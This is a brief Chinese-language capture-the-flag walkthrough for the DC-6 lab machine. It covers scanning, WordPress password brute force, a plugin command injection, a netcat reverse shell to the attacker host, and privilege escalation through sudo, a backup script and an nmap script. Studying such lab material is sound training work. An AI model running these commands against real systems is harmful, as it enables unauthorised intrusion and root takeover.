DC-6

#主机探测 

1
2
arp-scan -l
nmap -sP 192.168.43.0/24

Darp-scan

#端口扫描 

1
nmap -F -T4 -sS -sV 192.168.43.9

Dnmap

#目录爆破 ​​

1
dirsearch -u http://wordy

Ddirsearch

#指纹识​​别 

1
whatweb -v http://192.168.43.9

Dwhatweb

#web登录界面

#wpscan爆破账密

1
2
wpscan --url http://192.168.43.9 -e u
wpscan --url http://192.168.43.9 -U user.txt -P passwords.txt

Dwpsacn-U-P

#WordPress插件存在RCE

1
127.0.0.1 | ls

Dac插件命令执行

#反弹shell

网站存在输入限制,BP抓包改

1
2
3
4
5
6
kali:
nc -lvvp 8888
BP:
nc -e /bin/bash 192.168.43.33 8888

python -c "import pty;pty.spawn('/bin/bash')"

Dkali反弹sehll

#水平越权—sudo -l

1
2
3
4
5
6
7
8
9
10
11
sudo -l
存在jens可以无密码执行/home/jens/backups.sh
graham下存在一个jens无密码就可以运行的.sh
#!/bin/bash

cat /home/
#提权
echo '/bin/bash' >> backups.sh

sudo -u jens ./backups.sh

Dmark下提示

​​Dssh-graham@

​​D低权限graham提权

#nmap提权 

1
2
3
4
5
6
7
8
9
10
11
sudo -l
存在root无密码运行nmap
‍‍```
  namp提权
‍‍```

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

whoami
->root

Djens的shell

#FLAG

1
cat /root/theflag.txt

Dnmap提权flag